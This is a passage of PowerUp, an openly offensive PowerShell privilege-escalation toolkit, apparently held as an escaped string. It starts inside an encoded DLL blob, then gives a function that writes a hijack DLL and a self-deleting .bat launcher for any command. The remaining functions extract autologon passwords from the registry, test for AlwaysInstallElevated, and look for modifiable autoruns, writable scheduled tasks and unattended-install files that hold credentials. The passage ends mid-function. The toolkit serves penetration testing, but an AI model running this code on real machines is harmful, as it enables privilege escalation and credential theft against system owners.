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\"\n\n    if ($PSBoundParameters['Architecture']) {\n        $TargetArchitecture = $Architecture\n    }\n    elseif ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {\n        $TargetArchitecture = 'x64'\n    }\n    else {\n        $TargetArchitecture = 'x86'\n    }\n\n    if ($TargetArchitecture -eq 'x64') {\n        [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes64)\n    }\n    else {\n        [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)\n    }\n\n    if ($PSBoundParameters['BatPath']) {\n        $TargetBatPath = $BatPath\n    }\n    else {\n        $BasePath = $DllPath | Split-Path -Parent\n        $TargetBatPath = \"$BasePath\\debug.bat\"\n    }\n\n    # patch in the appropriate .bat launcher path\n    $DllBytes = Invoke-PatchDll -DllBytes $DllBytes -SearchString 'debug.bat' -ReplaceString $TargetBatPath\n\n    # build the launcher .bat\n    if (Test-Path $TargetBatPath) { Remove-Item -Force $TargetBatPath }\n\n    \"@echo off\" | Out-File -Encoding ASCII -Append $TargetBatPath\n    \"start /b $BatCommand\" | Out-File -Encoding ASCII -Append $TargetBatPath\n    'start /b \"\" cmd /c del \"%~f0\"&exit /b' | Out-File -Encoding ASCII -Append $TargetBatPath\n\n    Write-Verbose \".bat launcher written to: $TargetBatPath\"\n    Set-Content -Value $DllBytes -Encoding Byte -Path $DllPath\n    Write-Verbose \"$TargetArchitecture DLL Hijacker written to: $DllPath\"\n\n    $Out = New-Object PSObject\n    $Out | Add-Member Noteproperty 'DllPath' $DllPath\n    $Out | Add-Member Noteproperty 'Architecture' $TargetArchitecture\n    $Out | Add-Member Noteproperty 'BatLauncherPath' $TargetBatPath\n    $Out | Add-Member Noteproperty 'Command' $BatCommand\n    $Out.PSObject.TypeNames.Insert(0, 'PowerUp.HijackableDLL')\n    $Out\n}\n\n\n########################################################\n#\n# Registry Checks\n#\n########################################################\n\nfunction Get-RegistryAlwaysInstallElevated {\n<#\n.SYNOPSIS\n\nChecks if any of the AlwaysInstallElevated registry keys are set.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nReturns $True if the HKLM:SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated\nor the HKCU:SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated keys\nare set, $False otherwise. If one of these keys are set, then all .MSI files run with\nelevated permissions, regardless of current user permissions.\n\n.EXAMPLE\n\nGet-RegistryAlwaysInstallElevated\n\nReturns $True if any of the AlwaysInstallElevated registry keys are set.\n\n.OUTPUTS\n\nSystem.Boolean\n\n$True if RegistryAlwaysInstallElevated is set, $False otherwise.\n#>\n\n    [OutputType('System.Boolean')]\n    [CmdletBinding()]\n    Param()\n\n    $OrigError = $ErrorActionPreference\n    $ErrorActionPreference = 'SilentlyContinue'\n\n    if (Test-Path 'HKLM:SOFTWARE\\Policies\\Microsoft\\Windows\\Installer') {\n\n        $HKLMval = (Get-ItemProperty -Path 'HKLM:SOFTWARE\\Policies\\Microsoft\\Windows\\Installer' -Name AlwaysInstallElevated -ErrorAction SilentlyContinue)\n        Write-Verbose \"HKLMval: $($HKLMval.AlwaysInstallElevated)\"\n\n        if ($HKLMval.AlwaysInstallElevated -and ($HKLMval.AlwaysInstallElevated -ne 0)){\n\n            $HKCUval = (Get-ItemProperty -Path 'HKCU:SOFTWARE\\Policies\\Microsoft\\Windows\\Installer' -Name AlwaysInstallElevated -ErrorAction SilentlyContinue)\n            Write-Verbose \"HKCUval: $($HKCUval.AlwaysInstallElevated)\"\n\n            if ($HKCUval.AlwaysInstallElevated -and ($HKCUval.AlwaysInstallElevated -ne 0)){\n                Write-Verbose 'AlwaysInstallElevated enabled on this machine!'\n                $True\n            }\n            else{\n                Write-Verbose 'AlwaysInstallElevated not enabled on this machine.'\n                $False\n            }\n        }\n        else{\n            Write-Verbose 'AlwaysInstallElevated not enabled on this machine.'\n            $False\n        }\n    }\n    else{\n        Write-Verbose 'HKLM:SOFTWARE\\Policies\\Microsoft\\Windows\\Installer does not exist'\n        $False\n    }\n    $ErrorActionPreference = $OrigError\n}\n\n\nfunction Get-RegistryAutoLogon {\n<#\n.SYNOPSIS\n\nFinds any autologon credentials left in the registry.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nChecks if any autologon accounts/credentials are set in a number of registry locations.\nIf they are, the credentials are extracted and returned as a custom PSObject.\n\n.EXAMPLE\n\nGet-RegistryAutoLogon\n\nFinds any autologon credentials left in the registry.\n\n.OUTPUTS\n\nPowerUp.RegistryAutoLogon\n\nCustom PSObject containing autologin credentials found in the registry.\n\n.LINK\n\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb\n#>\n\n    [OutputType('PowerUp.RegistryAutoLogon')]\n    [CmdletBinding()]\n    Param()\n\n    $AutoAdminLogon = $(Get-ItemProperty -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name AutoAdminLogon -ErrorAction SilentlyContinue)\n    Write-Verbose \"AutoAdminLogon key: $($AutoAdminLogon.AutoAdminLogon)\"\n\n    if ($AutoAdminLogon -and ($AutoAdminLogon.AutoAdminLogon -ne 0)) {\n\n        $DefaultDomainName = $(Get-ItemProperty -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name DefaultDomainName -ErrorAction SilentlyContinue).DefaultDomainName\n        $DefaultUserName = $(Get-ItemProperty -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName\n        $DefaultPassword = $(Get-ItemProperty -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword\n        $AltDefaultDomainName = $(Get-ItemProperty -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name AltDefaultDomainName -ErrorAction SilentlyContinue).AltDefaultDomainName\n        $AltDefaultUserName = $(Get-ItemProperty -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name AltDefaultUserName -ErrorAction SilentlyContinue).AltDefaultUserName\n        $AltDefaultPassword = $(Get-ItemProperty -Path \"HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name AltDefaultPassword -ErrorAction SilentlyContinue).AltDefaultPassword\n\n        if ($DefaultUserName -or $AltDefaultUserName) {\n            $Out = New-Object PSObject\n            $Out | Add-Member Noteproperty 'DefaultDomainName' $DefaultDomainName\n            $Out | Add-Member Noteproperty 'DefaultUserName' $DefaultUserName\n            $Out | Add-Member Noteproperty 'DefaultPassword' $DefaultPassword\n            $Out | Add-Member Noteproperty 'AltDefaultDomainName' $AltDefaultDomainName\n            $Out | Add-Member Noteproperty 'AltDefaultUserName' $AltDefaultUserName\n            $Out | Add-Member Noteproperty 'AltDefaultPassword' $AltDefaultPassword\n            $Out.PSObject.TypeNames.Insert(0, 'PowerUp.RegistryAutoLogon')\n            $Out\n        }\n    }\n}\n\nfunction Get-ModifiableRegistryAutoRun {\n<#\n.SYNOPSIS\n\nReturns any elevated system autoruns in which the current user can\nmodify part of the path string.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-ModifiablePath  \n\n.DESCRIPTION\n\nEnumerates a number of autorun specifications in HKLM and filters any\nautoruns through Get-ModifiablePath, returning any file/config locations\nin the found path strings that the current user can modify.\n\n.EXAMPLE\n\nGet-ModifiableRegistryAutoRun\n\nReturn vulneable autorun binaries (or associated configs).\n\n.OUTPUTS\n\nPowerUp.ModifiableRegistryAutoRun\n\nCustom PSObject containing results.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.ModifiableRegistryAutoRun')]\n    [CmdletBinding()]\n    Param()\n\n    $SearchLocations = @(   \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\",\n                            \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\",\n                            \"HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\",\n                            \"HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\",\n                            \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunService\",\n                            \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceService\",\n                            \"HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunService\",\n                            \"HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnceService\"\n                        )\n\n    $OrigError = $ErrorActionPreference\n    $ErrorActionPreference = \"SilentlyContinue\"\n\n    $SearchLocations | Where-Object { Test-Path $_ } | ForEach-Object {\n\n        $Keys = Get-Item -Path $_\n        $ParentPath = $_\n\n        ForEach ($Name in $Keys.GetValueNames()) {\n\n            $Path = $($Keys.GetValue($Name))\n\n            $Path | Get-ModifiablePath | ForEach-Object {\n                $Out = New-Object PSObject\n                $Out | Add-Member Noteproperty 'Key' \"$ParentPath\\$Name\"\n                $Out | Add-Member Noteproperty 'Path' $Path\n                $Out | Add-Member Noteproperty 'ModifiableFile' $_\n                $Out | Add-Member Aliasproperty Name Key\n                $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableRegistryAutoRun')\n                $Out\n            }\n        }\n    }\n\n    $ErrorActionPreference = $OrigError\n}\n\n\n########################################################\n#\n# Miscellaneous checks\n#\n########################################################\n\nfunction Get-ModifiableScheduledTaskFile {\n<#\n.SYNOPSIS\n\nReturns scheduled tasks where the current user can modify any file\nin the associated task action string.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-ModifiablePath  \n\n.DESCRIPTION\n\nEnumerates all scheduled tasks by recursively listing \"$($ENV:windir)\\System32\\Tasks\"\nand parses the XML specification for each task, extracting the command triggers.\nEach trigger string is filtered through Get-ModifiablePath, returning any file/config\nlocations in the found path strings that the current user can modify.\n\n.EXAMPLE\n\nGet-ModifiableScheduledTaskFile\n\nReturn scheduled tasks with modifiable command strings.\n\n.OUTPUTS\n\nPowerUp.ModifiableScheduledTaskFile\n\nCustom PSObject containing results.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.ModifiableScheduledTaskFile')]\n    [CmdletBinding()]\n    Param()\n\n    $OrigError = $ErrorActionPreference\n    $ErrorActionPreference = \"SilentlyContinue\"\n\n    $Path = \"$($ENV:windir)\\System32\\Tasks\"\n\n    # recursively enumerate all schtask .xmls\n    Get-ChildItem -Path $Path -Recurse | Where-Object { -not $_.PSIsContainer } | ForEach-Object {\n        try {\n            $TaskName = $_.Name\n            $TaskXML = [xml] (Get-Content $_.FullName)\n            if ($TaskXML.Task.Triggers) {\n\n                $TaskTrigger = $TaskXML.Task.Triggers.OuterXML\n\n                # check schtask command\n                $TaskXML.Task.Actions.Exec.Command | Get-ModifiablePath | ForEach-Object {\n                    $Out = New-Object PSObject\n                    $Out | Add-Member Noteproperty 'TaskName' $TaskName\n                    $Out | Add-Member Noteproperty 'TaskFilePath' $_\n                    $Out | Add-Member Noteproperty 'TaskTrigger' $TaskTrigger\n                    $Out | Add-Member Aliasproperty Name TaskName\n                    $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableScheduledTaskFile')\n                    $Out\n                }\n\n                # check schtask arguments\n                $TaskXML.Task.Actions.Exec.Arguments | Get-ModifiablePath | ForEach-Object {\n                    $Out = New-Object PSObject\n                    $Out | Add-Member Noteproperty 'TaskName' $TaskName\n                    $Out | Add-Member Noteproperty 'TaskFilePath' $_\n                    $Out | Add-Member Noteproperty 'TaskTrigger' $TaskTrigger\n                    $Out | Add-Member Aliasproperty Name TaskName\n                    $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableScheduledTaskFile')\n                    $Out\n                }\n            }\n        }\n        catch {\n            Write-Verbose \"Error: $_\"\n        }\n    }\n    $ErrorActionPreference = $OrigError\n}\n\n\nfunction Get-UnattendedInstallFile {\n<#\n.SYNOPSIS\n\nChecks several locations for remaining unattended installation files,\nwhich may have deployment credentials.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.EXAMPLE\n\nGet-UnattendedInstallFile\n\nFinds any remaining unattended installation files.\n\n.LINK\n\nhttp://www.fuzzysecurity.com/tutorials/16.html\n\n.OUTPUTS\n\nPowerUp.UnattendedInstallFile\n\nCustom PSObject containing results.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.UnattendedInstallFile')]\n    [CmdletBinding()]\n    Param()\n\n    $OrigError = $ErrorActionPreference\n    $ErrorActionPreference = \"SilentlyContinue\"\n\n    $SearchLocations = @(   \"c:\\sysprep\\sysprep.xml\",\n                            \"c:\\sysprep\\sysprep.inf\",\n                            \"c:\\sysprep.inf\",\n                            (Join-Path $Env:WinDir \"\\Panther\\Unattended.xml\"),\n                            (Join-Path $Env:WinDir \"\\Panther\\Unattend\\Unattended.xml\"),\n                            (Join-Path $Env:WinDir \"\\Panther\\Unattend.xml\"),\n                            (Join-Path $Env:WinDir \"\\Panther\\Unattend\\Unattend.xml\"),\n                            (Join-Path $Env:WinDir \"\\System32\\Sysprep\\unattend.xml\"),\n                            (Join-Path $Env:WinDir \"\\System32\\Sysprep\\Panther\\unattend.xml\")\n                        )\n\n    # test the existence of each path and return anything found\n    $SearchLocations | Where-Object { 